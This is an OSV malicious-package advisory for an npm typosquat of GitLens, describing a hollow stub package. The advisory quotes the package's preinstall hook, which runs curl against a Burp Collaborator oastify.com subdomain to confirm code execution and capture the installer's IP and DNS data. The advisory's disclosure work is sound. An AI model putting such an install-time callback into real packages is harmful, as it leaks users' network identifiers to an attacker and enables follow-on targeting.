OSV ID
MAL-2026-6973
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle hook that runs curl https://bt8hbz0owdan31qvdap2u5b8izoqcg05.oastify.com on npm install . oastify.com is Burp Collaborator OAST infrastructure used to confirm code execution and capture the installer's public IP and DNS resolver metadata at an attacker-controlled listener. The package is otherwise a hollow stub (empty description, empty author, main is a one-line no-op printing 'Hello from test package'), and the package name impersonates the well-known GitLens project — matching the typosquat-with-reconnaissance-payload shape. Installing this package causes an unsolicited outbound HTTP/DNS callback that discloses installer network identifiers to a third party and confirms that arbitrary command execution succeeded on the installer's machine, enabling follow-on targeting.
Source: amazon-inspector (c60743ac7b975c729e8ff8bd5310f71fce030efc3979f419f60e129921364ae7)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.